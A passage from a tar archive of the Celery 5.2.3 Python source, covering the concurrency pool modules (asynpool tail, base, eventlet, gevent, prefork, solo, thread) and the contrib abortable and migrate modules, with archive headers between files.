1 if errors > 100: on_not_recovering(proc, fd, job, exc) raise StopIteration() yield else: errors = 0 # write body while Bw < body_size: try: Bw += send(body, Bw) except Exception as exc: # pylint: disable=broad-except if getattr(exc, 'errno', None) not in UNAVAIL: raise # suspend until more data errors += 1 if errors > 100: on_not_recovering(proc, fd, job, exc) raise StopIteration() yield else: errors = 0 finally: hub_remove(fd) write_stats[proc.index] += 1 # message written, so this fd is now available active_writes.discard(fd) write_generator_done(job._writer()) # is a weakref def send_ack(response, pid, job, fd): # Only used when synack is enabled. # Schedule writing ack response for when the fd is writable. msg = Ack(job, fd, precalc[response]) callback = promise(write_generator_done) cor = _write_ack(fd, msg, callback=callback) mark_write_gen_as_active(cor) mark_write_fd_as_active(fd) callback.args = (cor,) add_writer(fd, cor) self.send_ack = send_ack def _write_ack(fd, ack, callback=None): # writes ack back to the worker if synack enabled. # this operation *MUST* complete, otherwise # the worker process will hang waiting for the ack. header, body, body_size = ack[2] try: try: proc = fileno_to_synq[fd] except KeyError: # process died, we can safely discard the ack at this # point. raise StopIteration() send = proc.send_syn_offset Hw = Bw = 0 # write header while Hw < 4: try: Hw += send(header, Hw) except Exception as exc: # pylint: disable=broad-except if getattr(exc, 'errno', None) not in UNAVAIL: raise yield # write body while Bw < body_size: try: Bw += send(body, Bw) except Exception as exc: # pylint: disable=broad-except if getattr(exc, 'errno', None) not in UNAVAIL: raise # suspend until more data yield finally: if callback: callback() # message written, so this fd is now available active_writes.discard(fd) def flush(self): if self._state == TERMINATE: return # cancel all tasks that haven't been accepted so that NACK is sent # if synack is enabled. for job in tuple(self._cache.values()): if not job._accepted: if self.synack: job._cancel() else: job.discard() # clear the outgoing buffer as the tasks will be redelivered by # the broker anyway. if self.outbound_buffer: self.outbound_buffer.clear() self.maintain_pool() try: # ...but we must continue writing the payloads we already started # to keep message boundaries. # The messages may be NACK'ed later if synack is enabled. if self._state == RUN: # flush outgoing buffers intervals = fxrange(0.01, 0.1, 0.01, repeatlast=True) owned_by = {} for job in self._cache.values(): writer = _get_job_writer(job) if writer is not None: owned_by[writer] = job while self._active_writers: writers = list(self._active_writers) for gen in writers: if (gen.__name__ == '_write_job' and gen_not_started(gen)): # hasn't started writing the job so can # discard the task, but we must also remove # it from the Pool._cache. try: job = owned_by[gen] except KeyError: pass else: # removes from Pool._cache job.discard() self._active_writers.discard(gen) else: try: job = owned_by[gen] except KeyError: pass else: job_proc = job._write_to if job_proc._is_alive(): self._flush_writer(job_proc, gen) # workers may have exited in the meantime. self.maintain_pool() sleep(next(intervals)) # don't busyloop finally: self.outbound_buffer.clear() self._active_writers.clear() self._active_writes.clear() self._busy_workers.clear() def _flush_writer(self, proc, writer): fds = {proc.inq._writer} try: while fds: if not proc._is_alive(): break # process exited readable, writable, again = _select( writers=fds, err=fds, timeout=0.5, ) if not again and (writable or readable): try: next(writer) except (StopIteration, OSError, EOFError): break finally: self._active_writers.discard(writer) def get_process_queues(self): """Get queues for a new process. Here we'll find an unused slot, as there should always be one available when we start a new process. """ return next(q for q, owner in self._queues.items() if owner is None) def on_grow(self, n): """Grow the pool by ``n`` processes.""" diff = max(self._processes - len(self._queues), 0) if diff: self._queues.update({ self.create_process_queues(): None for _ in range(diff) }) def on_shrink(self, n): """Shrink the pool by ``n`` processes.""" def create_process_queues(self): """Create new in, out, etc. queues, returned as a tuple.""" # NOTE: Pipes must be set O_NONBLOCK at creation time (the original # fd), otherwise it won't be possible to change the flags until # there's an actual reader/writer on the other side. inq = _SimpleQueue(wnonblock=True) outq = _SimpleQueue(rnonblock=True) synq = None assert isblocking(inq._reader) assert not isblocking(inq._writer) assert not isblocking(outq._reader) assert isblocking(outq._writer) if self.synack: synq = _SimpleQueue(wnonblock=True) assert isblocking(synq._reader) assert not isblocking(synq._writer) return inq, outq, synq def on_process_alive(self, pid): """Called when receiving the :const:`WORKER_UP` message. Marks the process as ready to receive work. """ try: proc = next(w for w in self._pool if w.pid == pid) except StopIteration: return logger.warning('process with pid=%s already exited', pid) assert proc.inqW_fd not in self._fileno_to_inq assert proc.inqW_fd not in self._all_inqueues self._waiting_to_start.discard(proc) self._fileno_to_inq[proc.inqW_fd] = proc self._fileno_to_synq[proc.synqW_fd] = proc self._all_inqueues.add(proc.inqW_fd) def on_job_process_down(self, job, pid_gone): """Called for each job when the process assigned to it exits.""" if job._write_to and not job._write_to._is_alive(): # job was partially written self.on_partial_read(job, job._write_to) elif job._scheduled_for and not job._scheduled_for._is_alive(): # job was only scheduled to be written to this process, # but no data was sent so put it back on the outbound_buffer. self._put_back(job) def on_job_process_lost(self, job, pid, exitcode): """Called when the process executing job' exits. This happens when the process job' was assigned to exited by mysterious means (error exitcodes and signals). """ self.mark_as_worker_lost(job, exitcode) def human_write_stats(self): if self.write_stats is None: return 'N/A' vals = list(self.write_stats.values()) total = sum(vals) def per(v, total): return f'{(float(v) / total) if v else 0:.2f}' return { 'total': total, 'avg': per(total / len(self.write_stats) if total else 0, total), 'all': ', '.join(per(v, total) for v in vals), 'raw': ', '.join(map(str, vals)), 'strategy': SCHED_STRATEGY_TO_NAME.get( self.sched_strategy, self.sched_strategy, ), 'inqueues': { 'total': len(self._all_inqueues), 'active': len(self._active_writes), } } def _process_cleanup_queues(self, proc): """Called to clean up queues after process exit.""" if not proc.dead: try: self._queues[self._find_worker_queues(proc)] = None except (KeyError, ValueError): pass @staticmethod def _stop_task_handler(task_handler): """Called at shutdown to tell processes that we're shutting down.""" for proc in task_handler.pool: try: setblocking(proc.inq._writer, 1) except OSError: pass else: try: proc.inq.put(None) except OSError as exc: if exc.errno != errno.EBADF: raise def create_result_handler(self): return super().create_result_handler( fileno_to_outq=self._fileno_to_outq, on_process_alive=self.on_process_alive, ) def _process_register_queues(self, proc, queues): """Mark new ownership for ``queues`` to update fileno indices.""" assert queues in self._queues b = len(self._queues) self._queues[queues] = proc assert b == len(self._queues) def _find_worker_queues(self, proc): """Find the queues owned by ``proc``.""" try: return next(q for q, owner in self._queues.items() if owner == proc) except StopIteration: raise ValueError(proc) def _setup_queues(self): # this is only used by the original pool that used a shared # queue for all processes. self._quick_put = None # these attributes are unused by this class, but we'll still # have to initialize them for compatibility. self._inqueue = self._outqueue = \ self._quick_get = self._poll_result = None def process_flush_queues(self, proc): """Flush all queues. Including the outbound buffer, so that all tasks that haven't been started will be discarded. In Celery this is called whenever the transport connection is lost (consumer restart), and when a process is terminated. """ resq = proc.outq._reader on_state_change = self._result_handler.on_state_change fds = {resq} while fds and not resq.closed and self._state != TERMINATE: readable, _, _ = _select(fds, None, fds, timeout=0.01) if readable: try: task = resq.recv() except (OSError, EOFError) as exc: _errno = getattr(exc, 'errno', None) if _errno == errno.EINTR: continue elif _errno == errno.EAGAIN: break elif _errno not in UNAVAIL: debug('got %r while flushing process %r', exc, proc, exc_info=1) break else: if task is None: debug('got sentinel while flushing process %r', proc) break else: on_state_change(task) else: break def on_partial_read(self, job, proc): """Called when a job was partially written to exited child.""" # worker terminated by signal: # we cannot reuse the sockets again, because we don't know if # the process wrote/read anything from them, and if so we cannot # restore the message boundaries. if not job._accepted: # job was not acked, so find another worker to send it to. self._put_back(job) writer = _get_job_writer(job) if writer: self._active_writers.discard(writer) del writer if not proc.dead: proc.dead = True # Replace queues to avoid reuse before = len(self._queues) try: queues = self._find_worker_queues(proc) if self.destroy_queues(queues, proc): self._queues[self.create_process_queues()] = None except ValueError: pass assert len(self._queues) == before def destroy_queues(self, queues, proc): """Destroy queues that can no longer be used. This way they can be replaced by new usable sockets. """ assert not proc._is_alive() self._waiting_to_start.discard(proc) removed = 1 try: self._queues.pop(queues) except KeyError: removed = 0 try: self.on_inqueue_close(queues[0]._writer.fileno(), proc) except OSError: pass for queue in queues: if queue: for sock in (queue._reader, queue._writer): if not sock.closed: self.hub_remove(sock) try: sock.close() except OSError: pass return removed def _create_payload(self, type_, args, dumps=_pickle.dumps, pack=pack, protocol=HIGHEST_PROTOCOL): body = dumps((type_, args), protocol=protocol) size = len(body) header = pack('>I', size) return header, body, size @classmethod def _set_result_sentinel(cls, _outqueue, _pool): # unused pass def _help_stuff_finish_args(self): # Pool._help_stuff_finished is a classmethod so we have to use this # trick to modify the arguments passed to it. return (self._pool,) @classmethod def _help_stuff_finish(cls, pool): # pylint: disable=arguments-differ debug( 'removing tasks from inqueue until task handler finished', ) fileno_to_proc = {} inqR = set() for w in pool: try: fd = w.inq._reader.fileno() inqR.add(fd) fileno_to_proc[fd] = w except OSError: pass while inqR: readable, _, again = _select(inqR, timeout=0.5) if again: continue if not readable: break for fd in readable: fileno_to_proc[fd].inq._reader.recv() sleep(0) @property def timers(self): return {self.maintain_pool: 5.0} ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/base.py0000664000175000017500000001042500000000000020000 0ustar00asifasif00000000000000"""Base Execution Pool.""" import logging import os import sys import time from billiard.einfo import ExceptionInfo from billiard.exceptions import WorkerLostError from kombu.utils.encoding import safe_repr from celery.exceptions import WorkerShutdown, WorkerTerminate, reraise from celery.utils import timer2 from celery.utils.log import get_logger from celery.utils.text import truncate __all__ = ('BasePool', 'apply_target') logger = get_logger('celery.pool') def apply_target(target, args=(), kwargs=None, callback=None, accept_callback=None, pid=None, getpid=os.getpid, propagate=(), monotonic=time.monotonic, **_): """Apply function within pool context.""" kwargs = {} if not kwargs else kwargs if accept_callback: accept_callback(pid or getpid(), monotonic()) try: ret = target(*args, **kwargs) except propagate: raise except Exception: raise except (WorkerShutdown, WorkerTerminate): raise except BaseException as exc: try: reraise(WorkerLostError, WorkerLostError(repr(exc)), sys.exc_info()[2]) except WorkerLostError: callback(ExceptionInfo()) else: callback(ret) class BasePool: """Task pool.""" RUN = 0x1 CLOSE = 0x2 TERMINATE = 0x3 Timer = timer2.Timer #: set to true if the pool can be shutdown from within #: a signal handler. signal_safe = True #: set to true if pool uses greenlets. is_green = False _state = None _pool = None _does_debug = True #: only used by multiprocessing pool uses_semaphore = False task_join_will_block = True body_can_be_buffer = False def __init__(self, limit=None, putlocks=True, forking_enable=True, callbacks_propagate=(), app=None, **options): self.limit = limit self.putlocks = putlocks self.options = options self.forking_enable = forking_enable self.callbacks_propagate = callbacks_propagate self.app = app def on_start(self): pass def did_start_ok(self): return True def flush(self): pass def on_stop(self): pass def register_with_event_loop(self, loop): pass def on_apply(self, *args, **kwargs): pass def on_terminate(self): pass def on_soft_timeout(self, job): pass def on_hard_timeout(self, job): pass def maintain_pool(self, *args, **kwargs): pass def terminate_job(self, pid, signal=None): raise NotImplementedError( f'{type(self)} does not implement kill_job') def restart(self): raise NotImplementedError( f'{type(self)} does not implement restart') def stop(self): self.on_stop() self._state = self.TERMINATE def terminate(self): self._state = self.TERMINATE self.on_terminate() def start(self): self._does_debug = logger.isEnabledFor(logging.DEBUG) self.on_start() self._state = self.RUN def close(self): self._state = self.CLOSE self.on_close() def on_close(self): pass def apply_async(self, target, args=None, kwargs=None, **options): """Equivalent of the :func:`apply` built-in function. Callbacks should optimally return as soon as possible since otherwise the thread which handles the result will get blocked. """ kwargs = {} if not kwargs else kwargs args = [] if not args else args if self._does_debug: logger.debug('TaskPool: Apply %s (args:%s kwargs:%s)', target, truncate(safe_repr(args), 1024), truncate(safe_repr(kwargs), 1024)) return self.on_apply(target, args, kwargs, waitforslot=self.putlocks, callbacks_propagate=self.callbacks_propagate, **options) def _get_info(self): return { 'max-concurrency': self.limit, } @property def info(self): return self._get_info() @property def active(self): return self._state == self.RUN @property def num_processes(self): return self.limit ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/eventlet.py0000664000175000017500000001200600000000000020711 0ustar00asifasif00000000000000"""Eventlet execution pool.""" import sys from time import monotonic from greenlet import GreenletExit from kombu.asynchronous import timer as _timer from celery import signals from . import base __all__ = ('TaskPool',) W_RACE = """\ Celery module with %s imported before eventlet patched\ """ RACE_MODS = ('billiard.', 'celery.', 'kombu.') #: Warn if we couldn't patch early enough, #: and thread/socket depending celery modules have already been loaded. for mod in (mod for mod in sys.modules if mod.startswith(RACE_MODS)): for side in ('thread', 'threading', 'socket'): # pragma: no cover if getattr(mod, side, None): import warnings warnings.warn(RuntimeWarning(W_RACE % side)) def apply_target(target, args=(), kwargs=None, callback=None, accept_callback=None, getpid=None): kwargs = {} if not kwargs else kwargs return base.apply_target(target, args, kwargs, callback, accept_callback, pid=getpid()) class Timer(_timer.Timer): """Eventlet Timer.""" def __init__(self, *args, **kwargs): from eventlet.greenthread import spawn_after from greenlet import GreenletExit super().__init__(*args, **kwargs) self.GreenletExit = GreenletExit self._spawn_after = spawn_after self._queue = set() def _enter(self, eta, priority, entry, **kwargs): secs = max(eta - monotonic(), 0) g = self._spawn_after(secs, entry) self._queue.add(g) g.link(self._entry_exit, entry) g.entry = entry g.eta = eta g.priority = priority g.canceled = False return g def _entry_exit(self, g, entry): try: try: g.wait() except self.GreenletExit: entry.cancel() g.canceled = True finally: self._queue.discard(g) def clear(self): queue = self._queue while queue: try: queue.pop().cancel() except (KeyError, self.GreenletExit): pass def cancel(self, tref): try: tref.cancel() except self.GreenletExit: pass @property def queue(self): return self._queue class TaskPool(base.BasePool): """Eventlet Task Pool.""" Timer = Timer signal_safe = False is_green = True task_join_will_block = False _pool = None _pool_map = None _quick_put = None def __init__(self, *args, **kwargs): from eventlet import greenthread from eventlet.greenpool import GreenPool self.Pool = GreenPool self.getcurrent = greenthread.getcurrent self.getpid = lambda: id(greenthread.getcurrent()) self.spawn_n = greenthread.spawn_n super().__init__(*args, **kwargs) def on_start(self): self._pool = self.Pool(self.limit) self._pool_map = {} signals.eventlet_pool_started.send(sender=self) self._quick_put = self._pool.spawn self._quick_apply_sig = signals.eventlet_pool_apply.send def on_stop(self): signals.eventlet_pool_preshutdown.send(sender=self) if self._pool is not None: self._pool.waitall() signals.eventlet_pool_postshutdown.send(sender=self) def on_apply(self, target, args=None, kwargs=None, callback=None, accept_callback=None, **_): target = TaskPool._make_killable_target(target) self._quick_apply_sig(sender=self, target=target, args=args, kwargs=kwargs,) greenlet = self._quick_put( apply_target, target, args, kwargs, callback, accept_callback, self.getpid ) self._add_to_pool_map(id(greenlet), greenlet) def grow(self, n=1): limit = self.limit + n self._pool.resize(limit) self.limit = limit def shrink(self, n=1): limit = self.limit - n self._pool.resize(limit) self.limit = limit def terminate_job(self, pid, signal=None): if pid in self._pool_map.keys(): greenlet = self._pool_map[pid] greenlet.kill() greenlet.wait() def _get_info(self): info = super()._get_info() info.update({ 'max-concurrency': self.limit, 'free-threads': self._pool.free(), 'running-threads': self._pool.running(), }) return info @staticmethod def _make_killable_target(target): def killable_target(*args, **kwargs): try: return target(*args, **kwargs) except GreenletExit: return (False, None, None) return killable_target def _add_to_pool_map(self, pid, greenlet): self._pool_map[pid] = greenlet greenlet.link( TaskPool._cleanup_after_job_finish, self._pool_map, pid ) @staticmethod def _cleanup_after_job_finish(greenlet, pool_map, pid): del pool_map[pid] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/gevent.py0000664000175000017500000000651700000000000020365 0ustar00asifasif00000000000000"""Gevent execution pool.""" from time import monotonic from kombu.asynchronous import timer as _timer from . import base try: from gevent import Timeout except ImportError: # pragma: no cover Timeout = None __all__ = ('TaskPool',) # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. def apply_timeout(target, args=(), kwargs=None, callback=None, accept_callback=None, pid=None, timeout=None, timeout_callback=None, Timeout=Timeout, apply_target=base.apply_target, **rest): kwargs = {} if not kwargs else kwargs try: with Timeout(timeout): return apply_target(target, args, kwargs, callback, accept_callback, pid, propagate=(Timeout,), **rest) except Timeout: return timeout_callback(False, timeout) class Timer(_timer.Timer): def __init__(self, *args, **kwargs): from gevent import Greenlet, GreenletExit class _Greenlet(Greenlet): cancel = Greenlet.kill self._Greenlet = _Greenlet self._GreenletExit = GreenletExit super().__init__(*args, **kwargs) self._queue = set() def _enter(self, eta, priority, entry, **kwargs): secs = max(eta - monotonic(), 0) g = self._Greenlet.spawn_later(secs, entry) self._queue.add(g) g.link(self._entry_exit) g.entry = entry g.eta = eta g.priority = priority g.canceled = False return g def _entry_exit(self, g): try: g.kill() finally: self._queue.discard(g) def clear(self): queue = self._queue while queue: try: queue.pop().kill() except KeyError: pass @property def queue(self): return self._queue class TaskPool(base.BasePool): """GEvent Pool.""" Timer = Timer signal_safe = False is_green = True task_join_will_block = False _pool = None _quick_put = None def __init__(self, *args, **kwargs): from gevent import spawn_raw from gevent.pool import Pool self.Pool = Pool self.spawn_n = spawn_raw self.timeout = kwargs.get('timeout') super().__init__(*args, **kwargs) def on_start(self): self._pool = self.Pool(self.limit) self._quick_put = self._pool.spawn def on_stop(self): if self._pool is not None: self._pool.join() def on_apply(self, target, args=None, kwargs=None, callback=None, accept_callback=None, timeout=None, timeout_callback=None, apply_target=base.apply_target, **_): timeout = self.timeout if timeout is None else timeout return self._quick_put(apply_timeout if timeout else apply_target, target, args, kwargs, callback, accept_callback, timeout=timeout, timeout_callback=timeout_callback) def grow(self, n=1): self._pool._semaphore.counter += n self._pool.size += n def shrink(self, n=1): self._pool._semaphore.counter -= n self._pool.size -= n @property def num_processes(self): return len(self._pool) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/prefork.py0000664000175000017500000001323500000000000020540 0ustar00asifasif00000000000000"""Prefork execution pool. Pool implementation using :mod:`multiprocessing`. """ import os from billiard import forking_enable from billiard.common import REMAP_SIGTERM, TERM_SIGNAME from billiard.pool import CLOSE, RUN from billiard.pool import Pool as BlockingPool from celery import platforms, signals from celery._state import _set_task_join_will_block, set_default_app from celery.app import trace from celery.concurrency.base import BasePool from celery.utils.functional import noop from celery.utils.log import get_logger from .asynpool import AsynPool __all__ = ('TaskPool', 'process_initializer', 'process_destructor') #: List of signals to reset when a child process starts. WORKER_SIGRESET = { 'SIGTERM', 'SIGHUP', 'SIGTTIN', 'SIGTTOU', 'SIGUSR1', } #: List of signals to ignore when a child process starts. if REMAP_SIGTERM: WORKER_SIGIGNORE = {'SIGINT', TERM_SIGNAME} else: WORKER_SIGIGNORE = {'SIGINT'} logger = get_logger(__name__) warning, debug = logger.warning, logger.debug def process_initializer(app, hostname): """Pool child process initializer. Initialize the child pool process to ensure the correct app instance is used and things like logging works. """ # Each running worker gets SIGKILL by OS when main process exits. platforms.set_pdeathsig('SIGKILL') _set_task_join_will_block(True) platforms.signals.reset(*WORKER_SIGRESET) platforms.signals.ignore(*WORKER_SIGIGNORE) platforms.set_mp_process_title('celeryd', hostname=hostname) # This is for Windows and other platforms not supporting # fork(). Note that init_worker makes sure it's only # run once per process. app.loader.init_worker() app.loader.init_worker_process() logfile = os.environ.get('CELERY_LOG_FILE') or None if logfile and '%i' in logfile.lower(): # logfile path will differ so need to set up logging again. app.log.already_setup = False app.log.setup(int(os.environ.get('CELERY_LOG_LEVEL', 0) or 0), logfile, bool(os.environ.get('CELERY_LOG_REDIRECT', False)), str(os.environ.get('CELERY_LOG_REDIRECT_LEVEL')), hostname=hostname) if os.environ.get('FORKED_BY_MULTIPROCESSING'): # pool did execv after fork trace.setup_worker_optimizations(app, hostname) else: app.set_current() set_default_app(app) app.finalize() trace._tasks = app._tasks # enables fast_trace_task optimization. # rebuild execution handler for all tasks. from celery.app.trace import build_tracer for name, task in app.tasks.items(): task.__trace__ = build_tracer(name, task, app.loader, hostname, app=app) from celery.worker import state as worker_state worker_state.reset_state() signals.worker_process_init.send(sender=None) def process_destructor(pid, exitcode): """Pool child process destructor. Dispatch the :signal:`worker_process_shutdown` signal. """ signals.worker_process_shutdown.send( sender=None, pid=pid, exitcode=exitcode, ) class TaskPool(BasePool): """Multiprocessing Pool implementation.""" Pool = AsynPool BlockingPool = BlockingPool uses_semaphore = True write_stats = None def on_start(self): forking_enable(self.forking_enable) Pool = (self.BlockingPool if self.options.get('threads', True) else self.Pool) proc_alive_timeout = ( self.app.conf.worker_proc_alive_timeout if self.app else None ) P = self._pool = Pool(processes=self.limit, initializer=process_initializer, on_process_exit=process_destructor, enable_timeouts=True, synack=False, proc_alive_timeout=proc_alive_timeout, **self.options) # Create proxy methods self.on_apply = P.apply_async self.maintain_pool = P.maintain_pool self.terminate_job = P.terminate_job self.grow = P.grow self.shrink = P.shrink self.flush = getattr(P, 'flush', None) # FIXME add to billiard def restart(self): self._pool.restart() self._pool.apply_async(noop) def did_start_ok(self): return self._pool.did_start_ok() def register_with_event_loop(self, loop): try: reg = self._pool.register_with_event_loop except AttributeError: return return reg(loop) def on_stop(self): """Gracefully stop the pool.""" if self._pool is not None and self._pool._state in (RUN, CLOSE): self._pool.close() self._pool.join() self._pool = None def on_terminate(self): """Force terminate the pool.""" if self._pool is not None: self._pool.terminate() self._pool = None def on_close(self): if self._pool is not None and self._pool._state == RUN: self._pool.close() def _get_info(self): write_stats = getattr(self._pool, 'human_write_stats', None) return { 'max-concurrency': self.limit, 'processes': [p.pid for p in self._pool._pool], 'max-tasks-per-child': self._pool._maxtasksperchild or 'N/A', 'put-guarded-by-semaphore': self.putlocks, 'timeouts': (self._pool.soft_timeout or 0, self._pool.timeout or 0), 'writes': write_stats() if write_stats is not None else 'N/A', } @property def num_processes(self): return self._pool._processes ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/solo.py0000664000175000017500000000126500000000000020044 0ustar00asifasif00000000000000"""Single-threaded execution pool.""" import os from celery import signals from .base import BasePool, apply_target __all__ = ('TaskPool',) class TaskPool(BasePool): """Solo task pool (blocking, inline, fast).""" body_can_be_buffer = True def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.on_apply = apply_target self.limit = 1 signals.worker_process_init.send(sender=None) def _get_info(self): return { 'max-concurrency': 1, 'processes': [os.getpid()], 'max-tasks-per-child': None, 'put-guarded-by-semaphore': True, 'timeouts': (), } ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/thread.py0000664000175000017500000000234000000000000020332 0ustar00asifasif00000000000000"""Thread execution pool.""" from concurrent.futures import ThreadPoolExecutor, wait from .base import BasePool, apply_target __all__ = ('TaskPool',) class ApplyResult: def __init__(self, future): self.f = future self.get = self.f.result def wait(self, timeout=None): wait([self.f], timeout) class TaskPool(BasePool): """Thread Task Pool.""" body_can_be_buffer = True signal_safe = False def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.executor = ThreadPoolExecutor(max_workers=self.limit) def on_stop(self): self.executor.shutdown() super().on_stop() def on_apply(self, target, args=None, kwargs=None, callback=None, accept_callback=None, **_): f = self.executor.submit(apply_target, target, args, kwargs, callback, accept_callback) return ApplyResult(f) def _get_info(self): return { 'max-concurrency': self.limit, 'threads': len(self.executor._threads) # TODO use a public api to retrieve the current number of threads # in the executor when available. (Currently not available). } ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4437504 celery-5.2.3/celery/contrib/0000775000175000017500000000000000000000000015620 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/__init__.py0000664000175000017500000000000000000000000017717 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/abortable.py0000664000175000017500000001174300000000000020133 0ustar00asifasif00000000000000"""Abortable Tasks. Abortable tasks overview ========================= For long-running :class:`Task`'s, it can be desirable to support aborting during execution. Of course, these tasks should be built to support abortion specifically. The :class:`AbortableTask` serves as a base class for all :class:`Task` objects that should support abortion by producers. * Producers may invoke the :meth:`abort` method on :class:`AbortableAsyncResult` instances, to request abortion. * Consumers (workers) should periodically check (and honor!) the :meth:`is_aborted` method at controlled points in their task's :meth:`run` method. The more often, the better. The necessary intermediate communication is dealt with by the :class:`AbortableTask` implementation. Usage example ------------- In the consumer: .. code-block:: python from __future__ import absolute_import from celery.contrib.abortable import AbortableTask from celery.utils.log import get_task_logger from proj.celery import app logger = get_logger(__name__) @app.task(bind=True, base=AbortableTask) def long_running_task(self): results = [] for i in range(100): # check after every 5 iterations... # (or alternatively, check when some timer is due) if not i % 5: if self.is_aborted(): # respect aborted state, and terminate gracefully. logger.warning('Task aborted') return value = do_something_expensive(i) results.append(y) logger.info('Task complete') return results In the producer: .. code-block:: python from __future__ import absolute_import import time from proj.tasks import MyLongRunningTask def myview(request): # result is of type AbortableAsyncResult result = long_running_task.delay() # abort the task after 10 seconds time.sleep(10) result.abort() After the `result.abort()` call, the task execution isn't aborted immediately. In fact, it's not guaranteed to abort at all. Keep checking `result.state` status, or call `result.get(timeout=)` to have it block until the task is finished. .. note:: In order to abort tasks, there needs to be communication between the producer and the consumer. This is currently implemented through the database backend. Therefore, this class will only work with the database backends. """ from celery import Task from celery.result import AsyncResult __all__ = ('AbortableAsyncResult', 'AbortableTask') """ Task States ----------- .. state:: ABORTED ABORTED ~~~~~~~ Task is aborted (typically by the producer) and should be aborted as soon as possible. """ ABORTED = 'ABORTED' class AbortableAsyncResult(AsyncResult): """Represents an abortable result. Specifically, this gives the `AsyncResult` a :meth:`abort()` method, that sets the state of the underlying Task to `'ABORTED'`. """ def is_aborted(self): """Return :const:`True` if the task is (being) aborted.""" return self.state == ABORTED def abort(self): """Set the state of the task to :const:`ABORTED`. Abortable tasks monitor their state at regular intervals and terminate execution if so. Warning: Be aware that invoking this method does not guarantee when the task will be aborted (or even if the task will be aborted at all). """ # TODO: store_result requires all four arguments to be set, # but only state should be updated here return self.backend.store_result(self.id, result=None, state=ABORTED, traceback=None) class AbortableTask(Task): """Task that can be aborted. This serves as a base class for all :class:`Task`'s that support aborting during execution. All subclasses of :class:`AbortableTask` must call the :meth:`is_aborted` method periodically and act accordingly when the call evaluates to :const:`True`. """ abstract = True def AsyncResult(self, task_id): """Return the accompanying AbortableAsyncResult instance.""" return AbortableAsyncResult(task_id, backend=self.backend) def is_aborted(self, **kwargs): """Return true if task is aborted. Checks against the backend whether this :class:`AbortableAsyncResult` is :const:`ABORTED`. Always return :const:`False` in case the `task_id` parameter refers to a regular (non-abortable) :class:`Task`. Be aware that invoking this method will cause a hit in the backend (for example a database query), so find a good balance between calling it regularly (for responsiveness), but not too often (for performance). """ task_id = kwargs.get('task_id', self.request.id) result = self.AsyncResult(task_id) if not isinstance(result, AbortableAsyncResult): return False return result.is_aborted() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/migrate.py0000664000175000017500000003352300000000000017630 0ustar00asifasif00000000000000"""Message migration tools (Broker <-> Broker).""" import socket from functools import partial from itertools import cycle, islice from kombu import Queue, eventloop from kombu.common import maybe_declare from kombu.utils.encoding import ensure_bytes from celery.app import app_or_default from celery.utils.nodenames import worker_direct from celery.utils.text import str_to_list __all__ = ( 'StopFiltering', 'State', 'republish', 'migrate_task', 'migrate_tasks', 'move', 'task_id_eq', 'task_id_in', 'start_filter', 'move_task_by_id', 'move_by_idmap', 'move_by_taskmap', 'move_direct', 'move_direct_by_id', ) MOVING_PROGRESS_FMT = """\ Moving task {state.filtered}/{state.strtotal}: \ {body[task]}[{body[id]}]\ """ class StopFiltering(Exception): """Semi-predicate used to signal filter stop.""" class State: """Migration progress state.""" count = 0 filtered = 0 total_apx = 0 @property def strtotal(self): if not self.total_apx: return '?' return str(self.total_apx) def __repr__(self): if self.filtered: return f'^{self.filtered}' return f'{self.count}/{self.strtotal}' def republish(producer, message, exchange=None, routing_key=None, remove_props=None): """Republish message.""" if not remove_props: remove_props = ['application_headers', 'content_type', 'content_encoding', 'headers'] body = ensure_bytes(message.body) # use raw message body. info, headers, props = (message.delivery_info, message.headers, message.properties) exchange = info['exchange'] if exchange is None else exchange routing_key = info['routing_key'] if routing_key is None else routing_key ctype, enc = message.content_type, message.content_encoding # remove compression header, as this will be inserted again # when the message is recompressed. compression = headers.pop('compression', None) for key in remove_props: props.pop(key, None) producer.publish(ensure_bytes(body), exchange=exchange, routing_key=routing_key, compression=compression, headers=headers, content_type=ctype, content_encoding=enc, **props) def migrate_task(producer, body_, message, queues=None): """Migrate single task message.""" info = message.delivery_info queues = {} if queues is None else queues republish(producer, message, exchange=queues.get(info['exchange']), routing_key=queues.get(info['routing_key'])) def filter_callback(callback, tasks): def filtered(body, message): if tasks and body['task'] not in tasks: return return callback(body, message) return filtered def migrate_tasks(source, dest, migrate=migrate_task, app=None, queues=None, **kwargs): """Migrate tasks from one broker to another.""" app = app_or_default(app) queues = prepare_queues(queues) producer = app.amqp.Producer(dest, auto_declare=False) migrate = partial(migrate, producer, queues=queues) def on_declare_queue(queue): new_queue = queue(producer.channel) new_queue.name = queues.get(queue.name, queue.name) if new_queue.routing_key == queue.name: new_queue.routing_key = queues.get(queue.name, new_queue.routing_key) if new_queue.exchange.name == queue.name: new_queue.exchange.name = queues.get(queue.name, queue.name) new_queue.declare() return start_filter(app, source, migrate, queues=queues, on_declare_queue=on_declare_queue, **kwargs) def _maybe_queue(app, q): if isinstance(q, str): return app.amqp.queues[q] return q def move(predicate, connection=None, exchange=None, routing_key=None, source=None, app=None, callback=None, limit=None, transform=None, **kwargs): """Find tasks by filtering them and move the tasks to a new queue. Arguments: predicate (Callable): Filter function used to decide the messages to move. Must accept the standard signature of ``(body, message)`` used by Kombu consumer callbacks. If the predicate wants the message to be moved it must return either: 1) a tuple of ``(exchange, routing_key)``, or 2) a 